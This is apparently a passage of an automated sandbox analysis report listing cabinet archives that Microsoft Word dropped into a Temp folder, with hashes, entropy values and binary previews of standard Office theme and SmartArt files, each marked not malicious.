                                                                                    File Type:Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):35519
                                                                                    Entropy (8bit):7.846686335981972
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:2LFougzHaUdBKUsM+Z56zBjA8Pi6bo+ld8IX:MFodzHaULR9P7bo+l6IX
                                                                                    MD5:53EE9DA49D0B84357038ECF376838D2E
                                                                                    SHA1:AB03F46783B2227F312187DD84DC0C517510DE20
                                                                                    SHA-256:9E46B8BA0BAD6E534AF33015C86396C33C5088D3AE5389217A5E90BA68252374
                                                                                    SHA-512:751300C76ECE4901801B1F9F51EACA7A758D5D4E6507E227558AAAAF8E547C3D59FA56153FEA96B6B2D7EB08C7AF2E4D5568ACE7E798D1A86CEDE363EFBECF7C
                                                                                    Malicious:false
                                                                                    Preview:MSCF.....K......L............................K...?...................J.......@..............turabian.xsl."...............Content.inf._.......[...T.....C4.5...E0B.]...+.-f....rc.[52.$...a..I....{z...`hx.r...!.. $...l..\....#3EF..r..c;<p...&n.\b..K..0Y..c+.2...i..B..wwY..77,...........}.q.C.......n..,.....prrx.QHy.B#..,.'....3....%1.``..hf...~...[.[n.v.s..y.vw....;..s.G293G&H....$E......m.&^..iy/.4.C...D...".(H&..&.I4._...!...... ........q.k1.d.....qc.3.c.....;.5.......y}...}&...+.WAN.,zVY.Q....V.Tz........g..H..c...E2jY...4g?.yf<....V.M.s.$..k.Id....+..?..._.\.s.k..9..I%;.yWQ..S..]..*.n<.7........=......"Q.*E.....MG..j.Yt..!U....Q.j...v.h-.~b..e&.......;...\.....:.....=..Xv1&q........6\...xw.%*.VdS..H...o...s.....+..%[../>.t..I....F.....".G|.....=....[..S..3..a.C.ZZ...tK.6N..b........)>........I..m..QE.M.nv.MVl.....vCG>,.suP.gqo.rr....J`m....J.b..},[F*....e.A.]..r....C4.?JJs6..l.].9...Q.B.~.......\d%.X ...8A....rH....&?#...^.....4.h.{>

                                                                                    C:\Users\user\AppData\Local\Temp\cabE47A.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):25314
                                                                                    Entropy (8bit):7.729848360340861
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:75V23GNhfG/YvmBqWDP7G8E0GftpBjEB1vrFLrHRN7mKll7PK/pRU0:LS/Yvc7TG8Pi6BLm6IS0
                                                                                    MD5:C47E3430AF813DF8B02E1CB4829DD94B
                                                                                    SHA1:35F1F1A18AA4FD2336A4EA9C6005DBE70013C7FC
                                                                                    SHA-256:F2DB1E60533F0D108D5FB1004904C1F2E8557D4493F3B251A1B3055F8F1507A3
                                                                                    SHA-512:6F8904E658EB7D04C6880F7CC3EC63FCFE31EF2C3A768F4ECF40B115314F23774DAEE66DCE9C55FAF0AD31075A3AC27C8967FD341C23C953CA28BDC120997287
                                                                                    Malicious:false
                                                                                    Preview:MSCF.....#......D............................#...?...................#..............InterconnectedBlockProcess.glox......#..........Content.inf...<.:#.$[......O..........5f.P.5CU..6..jT..U..U..UM.T.........h................-... .......6...`.....G...........'.,DN:........... "..4..1u.....%.u..{{,....@lp..}..`.......Z...K.....Z..... Z4.<?..C.BF.....k.!Hl...]...Tvf..g....)...vny6.'..f....Z.R.`.......+....!..!.....:..4fj....."q..f..E..^!k.....M.c....R...B......g...~.........o.'.7,.e.,..7.R.e,(.+..+:....Q....f...P.H.I..U.....Jl...l...z.]7...C...<...L.,..@...i.{..e]K...2..KRW..7.-'.G.l!.n7..J.v.C...%/.....q...@..l..e..$..N..sg8]oo.(q(_.?.X.s...Ua..r0...Rz.o.eT.j...b*..}",n.qou..M.[.;%../c.x.4.z.2*.U.]..D...h...-R.$.=\3..P......N.mP......J...}BPn...g]d.5k..C.ee.ml...\.g...[.......<..6$.%.I#S9..I...6.i........_..P.n....c$.3..zw.hF......_{.+...o...[.&........&...M..m.....;....0....D7...4nQ.=/.._`._.nh.D.m..h.+....8..p..q.4.w.\...iy...*...lN6F..c.

                                                                                    C:\Users\user\AppData\Local\Temp\cabE47B.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):21357
                                                                                    Entropy (8bit):7.641082043198371
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:zdx+NRrogu6fzCI7Th7G8E0GftpBjEzZq4FLrHRN7/Oll7PK/pB:/+NRrFf/G8Pi6zZb/GIB
                                                                                    MD5:97F5B7B7E9E1281999468A5C42CB12E7
                                                                                    SHA1:99481B2FA609D1D80A9016ADAA3D37E7707A2ED1
                                                                                    SHA-256:1CF5C2D0F6188FFFF117932C424CC55D1459E0852564C09D7779263ABD116118
                                                                                    SHA-512:ACE9718D724B51FE04B900CE1D2075C0C05C80243EA68D4731A63138F3A1287776E80BD67ECB14C323C69AA1796E9D8774A3611FE835BA3CA891270DE1E7FD1F
                                                                                    Malicious:false
                                                                                    Preview:MSCF....].......D...........................]....?..........{.......................rings.glox.................Content.inf..|^.....[......P........<.$.."..0R..xa.Ax#B..d... ....K,.....^.H.....H.........&.j.\f.. ..,....,..!k..R..e..!...E...........................><.RB.....~h...........Q................g..M|,...x.....qV7.u..\...F-N.{-..X..&Zig.~..{.A.p.Z...X..{,-n............`$.%.ND.....>].6cvZ.%d..*a.$..-.K.Hf....L..;.#...H....U,........P.@.*-$C.,.g...%YJE..$.jP........b...Y<..[U...MF]F.K...1... x.}3w.o.#,.}T.....w5+...=.=...c.F^....OM.=.......G_{n.*...WC.w!......{/.~.}..s..6_......)..Xy...4.....<..XZJ........#~._i....%..fM.V.?.q...q.....7...B..sVt...(.:..c....~.e...kGZ...C..(J..o...`...?.)-.T.l....&...gR.$.....g.:...2.e%F.....x....z0...K..a8B...........D..]....7....~.".DR...r)...}b)e.>.\h~f...(}.c........Q...o5H.........C.KC.(.L.l................R..a.pg{..\.......-b........}.C......qTS..%..r.lG..Q.1..Z.>a.D...tC..LV...Rs.C.M18x.:......%O.

                                                                                    C:\Users\user\AppData\Local\Temp\cabE47C.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):21111
                                                                                    Entropy (8bit):7.6297992466897675
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:wWZsOvbMZGgbA8E0GftpBjEtnFLrHRN7Dfll7PK/pirk:xZRvuzA8Pi6t9DPISk
                                                                                    MD5:D30AD26DBB6DECA4FDD294F48EDAD55D
                                                                                    SHA1:CA767A1B6AF72CF170C9E10438F61797E0F2E8CE
                                                                                    SHA-256:6B1633DD765A11E7ED26F8F9A4DD45023B3E4ADB903C934DF3917D07A3856BFF
                                                                                    SHA-512:7B519F5D82BA0DA3B2EFFAD3029C7CAB63905D534F3CF1F7EA3446C42FA2130665CA7569A105C18289D65FA955C5624009C1D571E8960D2B7C52E0D8B42BE457
                                                                                    Malicious:false
                                                                                    Preview:MSCF....g.......D...........................g....?..........}.......................TabList.glox.................Content.inf....t....[......@..C...../.U5...........6...`.....T..>3.................=..09`..t......a..Y..BI.Z....=.'0...%...T..........H...>.:A.r......n..p...Pf.h...I.8... ....M.]&.#.vv'.....[c......g....>"......<c..f....i...sb!Z..iu<.%|......q.....G28.h-...7.....W.v...RtdK..F~.0.3.'.e..b7.c......a.3.....a\..]...gp8.+.u/}.w.qF........8.=.=|....\~..S.-q}]0...q.B.H.^J...!...a'.2Tn!..."..%........=.e_-.....{o..%o...a`.w..L.5..r.....e.8...pO..RE.Wgr..b.%.E...O.......8s...E....Um].C..M.....[...H.FZ..4...eZI.$..v.3<]..r....B..............8i......e<.D...Q4.q.^S.....H.b.......r.q..0o.......2..PP,."...JI...xU`.6f..K..Q9.Q..h..t....AI.S6...7............X..`dv..r..S....),7ES....#.....(...\.nh...X.ps%l..F...."<_....q....v........_.e.....P.........|&..fi..4..@..^0..v.]7.......^. ."..}(...w.g.X...=<....p.......L...P..XV....@:....N...Y....

                                                                                    C:\Users\user\AppData\Local\Temp\cabE47D.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):21791
                                                                                    Entropy (8bit):7.65837691872985
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:PWew5RNDcvPgbA8E0GftpBjE0hsyaFLrHRN7BD9lI66YR:P3GRNDcEA8Pi60hsyABDo66g
                                                                                    MD5:7BF88B3CA20EB71ED453A3361908E010
                                                                                    SHA1:F75F86557051160507397F653D7768836E3B5655
                                                                                    SHA-256:E555A610A61DB4F45A29A7FB196A9726C25772594252AD534453E69F05345283
                                                                                    SHA-512:2C3DFB0F8913D1D8FF95A55E1A1FD58CE1F9D034268CD7BC0D2BF2DCEFEA8EF05DD62B9AFDE1F983CACADD0529538381632ADFE7195EAC19CE4143414C44DBE3
                                                                                    Malicious:false
                                                                                    Preview:MSCF............D................................?..................................RadialPictureList.glox.................Content.inf....8....[.... $nq......C...../U..........a......S.Q...Q....j............(..z,.g.........^...Y..D... #i.TH5.<.=N..$..7.p".7.............`.3..1~,=,(.d8.Z.1....4'G.....!W^gClf._j.-N..&k.....Y3` =.(S..B^...i.zB.U....0O..h...I.(.......L...5.X.8.Sc<=>w.=.?&.....mR.......x.......mpW.T..^.FU...SN.C)......vsa.,x......,....E..i>..[g...#t...M..GR.9..$/4.:..q.bc9..x{bC.0..K.)..t.Y.&.v.d.16.B..c..or..W.,.B.........O.0..k.v........*F+..U.w...d...o8......A).}...#......L.!?.U.r.^.$...e.(..PG)8..+.9.5.l}.)..b.7+. 4....-.lC...|..j..Q.,.....7.W...|;j...%...:...|H..........<..%...K.....Fy.q$.k..}..8.9.M.u.?$].......r.....e.|..._..iT.;Dq5[....f.s..P.......e.T....!Y{.....t.wm..A..w-..7...3..T.:8.4.a[.Oo.. V.l.@.}..........E.&..J.....+..+.9)9<.._R.Hb.....V..Qu....:v.t.Li.0..J..V..b...!..N....-mD..c..(.[&o>.M.b..H.q..lk../..........W.8..z..B...

                                                                                    C:\Users\user\AppData\Local\Temp\cabE47E.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):23597
                                                                                    Entropy (8bit):7.692965575678876
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:y6aR//q0bJi/Uj+957G8E0GftpBj/4YOFLrHRN7LxhKll7PK/ph:y6I/Li/UjmVG8PiZ4YsLxh6Ih
                                                                                    MD5:7C645EC505982FE529D0E5035B378FFC
                                                                                    SHA1:1488ED81B350938D68A47C7F0BCE8D91FB1673E2
                                                                                    SHA-256:298FD9DADF0ACEBB2AA058A09EEBFAE15E5D1C5A8982DEE6669C63FB6119A13D
                                                                                    SHA-512:9F410DA5DB24B0B72E7774B4CF4398EDF0D361B9A79FBE2736A1DDD770AFE280877F5B430E0D26147CCA0524A54EA8B41F88B771F3598C2744A7803237B314B2
                                                                                    Malicious:false
                                                                                    Preview:MSCF............D................................?..................................pictureorgchart.glox.................Content.inf.W..y....[.............../.jC....U.CUUUTU.5...jjPU..MP....T..0*....o0.......Y.=....P.({.3.p..."pA!>r../3.q..7...........!...TO....(..%......6...3E?....~......CZmndse.Qy....p....h....=.:5...F..%.E.&.v.`I~. ..%._..b]..Y..Q..R.........nN.q8c..a..L..X/.M...PP.q..SpZ.K]>D"Pf..B.c....0..|I.Q.,.g/..Kev.../..=......w..}3.....(....+#T.....K`N.u..Z.....rriK.(...(...6.<R.%.]..NX..b..].C.u....++......Ia.x. .7....J.#............w>....7..R...H>....@%....~.yA.......~.UB..*. .P..$...-...v.....=M."....hw..b....{.....2pR....].C..u@=G."Y..;..gc/N.N.YB.Z.q.#....$....j.D.*.P..!.)S.{..c....&'E.lJ%.|O.a...FG.|.....A..h.=c7.)d.5...D...L...IQ..TTE.*NL-.*M..>..p0.`......m..,.w#rZ..wR\@.Wn..@Q...}..&...E...0K.NY....M.71..`.M./:.>..._L..m...,U.l....._fi...nj9..,..w.s.kJ.m.s.M.vmw.!.....B.s.%.-').h.....)c.l....F..`3r...-.....0..7..&N.....n.#H...<7

                                                                                    C:\Users\user\AppData\Local\Temp\cabE47F.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):19288
                                                                                    Entropy (8bit):7.570850633867256
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:5ZII4Hf+7G8E0GftpBjCwBFLrHRN7bcClvQyUTL2mH:pG8PicgbcAvU+mH
                                                                                    MD5:B9A6FF715719EE9DE16421AB983CA745
                                                                                    SHA1:6B3F68B224020CD4BF142D7EDAAEC6B471870358
                                                                                    SHA-256:E3BE3F1E341C0FA5E9CB79E2739CF0565C6EA6C189EA3E53ACF04320459A7070
                                                                                    SHA-512:062A765AC4602DB64D0504B79BE7380C14C143091A09F98A5E03E18747B2166BD862CE7EF55403D27B54CEB397D95BFAE3195C15D5516786FEBDAC6CD5FBF9CD
                                                                                    Malicious:false
                                                                                    Preview:MSCF....H.......D...........................H....?..................................VaryingWidthList.glox.................Content.inf...O.....[.... v.q......R.....>.%i.I.HhD.V...qt.....'....N...!..aw$(J.%(..A..h......l|.D.p9`..Y09.:.u....p. :,.*.YD=0.p. ......w.........*..<..;.....u.."......7[....8.....?^........-..;q.|.....B....PJ....r.K#.#.0'...}.........+gpR...T....5.iu.^I...A\..gK....}..z.B.nT.../.m.......N....E'1.E.\..o.....W..R.#.#...8.7...R.SbW-...%......$.obj.F..W_@....sY!........s.O..."k. ..b....j....v...P.\....7d...|"J.T...2p..m.&..r..,2.).....X.`...xt].U...b.h..V.....|L..N.Z.O#....o...1R.w30.g..?;..C.T.:$..MGY.C"i\.f..#..<.k...m..s.w. ..Ga].....wt.h|.Ta<.......(SO.]9.%a..Z... r._JH.=O...P.9a.v.....Kj.".T...m...4.?...F...$...y.....hbW.UA..u.&)....py.C{.=t.....n...}|H3A9.=..W..JJ..y./Y.E.M9..Z..w. .HB.YoIi..i.e..9;n...SpHw,....f....d>..g.m..z...... ...f...KP.M..U.....~vFD.fQ.P?......2!.n.....`@C!G...XI.].s,.X.'...u.E.o..f

                                                                                    C:\Users\user\AppData\Local\Temp\cabE491.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):22008
                                                                                    Entropy (8bit):7.662386258803613
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:M7FUtfIdqSHQs7G8E0GftpBjED/C4RQrFLrHRN7TT8DlvQyUTL2mH:sWgdqR2G8Pi6D6YQZTTMvU+mH
                                                                                    MD5:ABBF10CEE9480E41D81277E9538F98CB
                                                                                    SHA1:F4EA53D180C95E78CC1DA88CD63F4C099BF0512C
                                                                                    SHA-256:557E0714D5536070131E7E7CDD18F0EF23FE6FB12381040812D022EC0FEE7957
                                                                                    SHA-512:9430DAACF3CA67A18813ECD842BE80155FD2DE0D55B7CD16560F4AAEFDA781C3E4B714D850D367259CAAB28A3BF841A5CB42140B19CFE04AC3C23C358CA87FFB
                                                                                    Malicious:false
                                                                                    Preview:MSCF............D................................?..................................architecture.glox.................Content.inf..q5.^...[.....0y......../..CL.C5.Q..U5g.z....UUUMPC...C..P....T.....=..s..4c...-3H..E...2..2*..T...../.i.;$..............%...................'h.........#0.......[........c.h.....O...%.61...[.J..:.,^....W.]$..u...N.R.....H.......:%I.g5Kd.n6...W2.#.UL..h.8NN../.P...H.;@.N.F...v."h..K.....~.....8...{.+...&.#A.Q'..A.....[NJ.X.....|.|.G5...vp.h.p..1.....-...gECV.,o{6W.#L....4v..x..z..)[.......T.....BQ.pf..D.}...H....V..[._.'.......3..1....?m..ad..c(K.......N.N.6F%.m......9...4..]?...l6..).\p;w.s....@...I%H.....;\...R......f...3~:C...A..x....X...>...:~.+..r@..."......I..m.y..)F.l..9...6....m...=..Q.F.z..u......J].{WX...V.Z.b.A0B..!....~.;Z.....K.`c..,X.MFz....].Q.2.9..L."...]...6...JOU..6...~../......4A.|.......i.LKrY...2.R.o..X.\....0.%......>H.....8.z..^....5d|...4|...C......R28.E......a....e...J.S..Ng.]<&..mm

                                                                                    C:\Users\user\AppData\Local\Temp\cabE492.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):20457
                                                                                    Entropy (8bit):7.612540359660869
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:KyeISBuydn5rpmp77G8E0GftpBjE/kFLrHRN7ngslI66YVj:KHISBvd5rpmFG8Pi6/6nK666j
                                                                                    MD5:4EFA48EC307EAF2F9B346A073C67FCFB
                                                                                    SHA1:76A7E1234FF29A2B18C968F89082A14C9C851A43
                                                                                    SHA-256:3EE9AE1F8DAB4C498BD561D8FCC66D83E58F11B7BB4B2776DF99F4CDA4B850C2
                                                                                    SHA-512:2705644D501D85A821E96732776F61641FE82820FD6A39FFAF54A45AD126C886DC36C1398CDBDBB5FE282D9B09D27F9BFE7F26A646F926DA55DFF28E61FBD696
                                                                                    Malicious:false
                                                                                    Preview:MSCF............D................................?..................................chevronaccent.glox.................Content.inf..O.$N...[.........B.....?.....$Zy..Zkr...y<.....Di-.aVX/....h..-.~........#.../.Fz....T...p....A..eHMe[..p...=................f..../%o......F@..=..$.B!....}.0..g..^vlI......f.W.F...Nm..2`...)...,.HL4.nsl.F.ir.k..e.!^.j2.v.iT....t...*..!h..Y...2Q..-.x.,.Xj.U.cj,....9.....)..W..n3f.......(cH.D.4M.!.+..4..3r..y......|r..@.PD.R..#...F..nJAR..1{-.....u3..$..L.b+h....:lZ.>....q.?. ~l..^.%.m....a...cG.h.?.|.?7.'....b.G.4..'..A...o.Z...//..?...d..*.....C..Z.....]Yv.g.]..... .........]x.#=.../.7;R.j....G.....zq=O`[.'5g.D.u..)..../../.v.JmCW.da....3.f..C.z%...S=....;A.q.|....z.E.aRu........ k..J"+.f.S.@.........eD4....\0..t./U..%.H..........M:..U.......J...Z..H.DG..u^..D..P....`.^b.........`c......#.....c.?...#..C.V.&.'..f.'...f.[..F.O..a...&..{TiXg4; .X."..0...B.#..^..........N"..w.@f...gd.S..K.....E....ZR...;.twR>.z.

                                                                                    C:\Users\user\AppData\Local\Temp\cabE550.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):222992
                                                                                    Entropy (8bit):7.994458910952451
                                                                                    Encrypted:true
                                                                                    SSDEEP:6144:k8/c2cF9GTLqsTmYstUdx+dwb2ooiVOfiI17zWbQ:jbzqGdpbZ/Mf3h68
                                                                                    MD5:26BEAB9CCEAFE4FBF0B7C0362681A9D2
                                                                                    SHA1:F63DD970040CA9F6CFCF5793FF7D4F1F4A69C601
                                                                                    SHA-256:217EC1B6E00A24583B166026DEC480D447FB564CF3BCA81984684648C272F767
                                                                                    SHA-512:2BBEA62360E21E179014045EE95C7B330A086014F582439903F960375CA7E9C0CF5C0D5BB24E94279362965CA9D6A37E6AAA6A7C5969FC1970F6C50876582BE1
                                                                                    Malicious:false
                                                                                    Preview:MSCF.....'......D...............]............'..H?..........z..................M{. .content.inf..l.........M{. .View.thmx......R..[...........@...G...I..(J.....B....Q!....}Ju..(BR..._|.5.%.....6m...........?.w{.rm,....#....;Ba#.:v...Dv.."u.v{!...f}......!......:.S.......".z.f.......==.n.0Km0eh.Kbm.C.r.6.........d..h.....{..w..}....2sb...rvm..x...0(..B... ...BH.r#.@..d".*..F+...Q.sx.....?...d.d.eZ2W2.2d...q.I....4.e4....#.....K...3...1.p.y......>.~V....cm....n^..b.{..._D?..AG...'...k.L&..h}=p.....Wl....(.......>.~.].....'.4.W{......../......7.....'.s...w...6..hn..e.2.).l]u.v4...GF.X..X..X....G.i.\..y.g&.<&ti......Sp,j.....>I..S..%.y..........S..-).+...>...D..............[...d...jt.~<x.a(.MDW..a..ZI.;+..!,.$...~>#...).R4...K.$.Zm......b...........{..._..A{.}..r...X...T.ZI.T.).J...$.".U,.9...r.z.)......}...()<....m....QS.p...;?..5.W~2r.EZu..P.1.%'l.........+/6.Mm.|2....Ty..f.o.S.....3J.._...X,..m....:..1.<GqFy.QA9W4.=....n...ZP...O.\.[...:8.%.^..H.....

                                                                                    C:\Users\user\AppData\Local\Temp\cabE643.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):307348
                                                                                    Entropy (8bit):7.996451393909308
                                                                                    Encrypted:true
                                                                                    SSDEEP:6144:7vH3uG+yiWx0eVJyORloyyDqnHefzOs81MrXLXx7:b36yiWH/LRS2CJl1
                                                                                    MD5:0EBC45AA0E67CC435D0745438371F948
                                                                                    SHA1:5584210C4A8B04F9C78F703734387391D6B5B347
                                                                                    SHA-256:3744BFA286CFCFF46E51E6A68823A23F55416CD6619156B5929FED1F7778F1C7
                                                                                    SHA-512:31761037C723C515C1A9A404E235FE0B412222CB239B86162D17763565D0CCB010397376FB9B61B38A6AEBDD5E6857FD8383045F924AF8A83F2C9B9AF6B81407
                                                                                    Malicious:false
                                                                                    Preview:MSCF....tq......D...........................tq.. ?..........|..................Mn. .Banded.thmx............Mn. .content.inf..;.u.i..[...............?....^.j.{j.B...$M/!...W....{!..^0x/.6...&............w......$.B..J.?a.$=...P..L...d..........+./.\..E:h.....-.$..u-.I..L\.M.r..Y..:rtX:....8...........+8.}{......&.-..f.f..s3-P.''.r...Z-"/E../...^%^N(,.$..$.H..O........q>...|.|......y..m.)u....`.....z.n..-.[.5....xL....M...O..3uCX..=4.....7.yh...dg.;..c.x.4..6..e..p.e"..,.!.St{..E..^I.9j....;..`.Y..#.0..f...G.....9~./....QCz.93..u%hz.........t9.""........)..7K.c~E!..x.E.p...[......o..O.j.c.......6.t{...".....t9V;xv....n<.F.S2.gI.#6...u..O..F.9.[.L.....K....#..zL..I...o....k...qog.......V..BKM..#.bET.)..&4..m.w...*....E.a[.Q.y.B...w...r.nd...)...<..#..r[4.y...#.z.....m?.2K.^...R{..m..f......r?]..>@...ra$...C+..l].9...."..rM9=......]".'...b&2e...y..a..4....ML..f...f"..l..&.Rv=2LL..4...3t_x...G....w..I.K....s.t.....).......{ur.y2...O3.K*f.*P(..F..-.y.Z...

                                                                                    C:\Users\user\AppData\Local\Temp\cabE644.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):261258
                                                                                    Entropy (8bit):7.99541965268665
                                                                                    Encrypted:true
                                                                                    SSDEEP:6144:9blShNYrHNn0JU+D+kh8CIjXHWC7X0nZLC9Ge2KY/WfI:9ZSTYrtn0Sk+CIDHWC7chVKYx
                                                                                    MD5:65828DC7BE8BA1CE61AD7142252ACC54
                                                                                    SHA1:538B186EAF960A076474A64F508B6C47B7699DD3
                                                                                    SHA-256:849E2E915AA61E2F831E54F337A745A5946467D539CCBD0214B4742F4E7E94FF
                                                                                    SHA-512:8C129F26F77B4E73BF02DE8F9A9F432BB7E632EE4ABAD560A331C2A12DA9EF5840D737BFC1CE24FDCBB7EF39F30F98A00DD17F42C51216F37D0D237145B8DE15
                                                                                    Malicious:false
                                                                                    Preview:MSCF............D...............nJ...............D.................."..........M. .content.inf....."......M. .Metropolitan.thmx...cVtP..[.....`Q..B.....=.T.....h.."...Z..|..}hZK.V....Z..Z................?..v...[S$."...H......^u.%.@...>....... f.........1.5......*&lm.tZ.msz:...Noc....1....D .........b..... ..3#pVp....}oo]{m......H*[%i.GNHB1D<......(*# ....H"....DP..b(B.<.....v......_..`.7..;.}............/.p}.:vp....~l0..].........S....G?.....}..U.;......dNi..?........-c..J.z....Z...._.O.....C..o.,......z....F....sOs$..w9......2G..:@...'....=.....M..am.....S......(`.._....'......[..K"....BD...D...^1k.....xi...Gt....{k@.W.....AZ+(,...+..o......I.+.....D..b. T.:..{..v.....g..........L.H.`...uU~C.d...{...4.N.N..m8..v.7..3.`.....,...W...s.;.fo.8.Y...2.i...T&.-...v8..v.U.Y=...8..F.hk..E.PlI.t.8......A.R....+.]lOei..2...... gS*.......%8H.....<.U.D..s.....>.....D_...../....l.......5O1S~.........B.g.++cV.z.f .R.Z.......@6....(..t^5"...#G...

                                                                                    C:\Users\user\AppData\Local\Temp\cabE645.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):276650
                                                                                    Entropy (8bit):7.995561338730199
                                                                                    Encrypted:true
                                                                                    SSDEEP:6144:H2a+HFkDF8gpmMt4kzwVVqhSYO6DITxPWgJl1CFExwXyo7N:mlZgFtIVVTuDExeWuv7N
                                                                                    MD5:84D8F3848E7424CBE3801F9570E05018
                                                                                    SHA1:71D7F2621DA8B295CE6885F8C7C81016D583C6B1
                                                                                    SHA-256:B4BC3CD34BD328AAF68289CC0ED4D5CF8167F1EE1D7BE20232ED4747FF96A80A
                                                                                    SHA-512:E27873BFD95E464CB58B3855F2DA404858B935530CF74C7F86FF8B3FC3086C2FAEA09FA479F0CA7B04D87595ED8C4D07D104426FF92DFB31BED405FA7A017DA8
                                                                                    Malicious:false
                                                                                    Preview:MSCF............D................................D..........~..................M. .content.inf............M. .Dividend.thmx..).}.b..[.....`.........?.R...T../..............4..yy....{...f.h..\U......sy.gV0Q.@..A..@..3a.A}........7.q.......8......R....sJ)E..ENr.S*B.1..).s.r.J.D.b."..........(.....E$.V........y.5.L....;gY..QK/nni..x..3.<..Q.Q..K.I.....T.z.,F.....{.p.....;8._.&../...........X...}.;[Gk..._.i`m.u.?...s.w...4.....m......l....5..n.?..c..m...,.....{.k.?......sC.............e..1....oL.8./......1._.K:.]..&......O............qo.....Dd/c...6.q.*......V.v........h....L..h..C+..V..;O.(7Z]{I%....S3.{h....\...b.......5.ES......Z.4...o.c`..YA....9i....M.s....Z3.oq`....>.i..@.@n.a...x.3.zp.<....vU/.|^CvE...aD.P&mhvM>.p..B~....."._.......v-.m..w..?._..=...:...k....i.}x.6....Y.i..n....h...j......LZ.....fk..f0.y.T..Vl.;...s.......B6.f.'z.c.\W?...4U)..aJ.;O....L.d7.J.V#Q.....\J.F.?].d}!..y].6..%..~....|......5...'N.#.....t6.,.E.O."..0fyz....

                                                                                    C:\Users\user\AppData\Local\Temp\cabE6A6.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
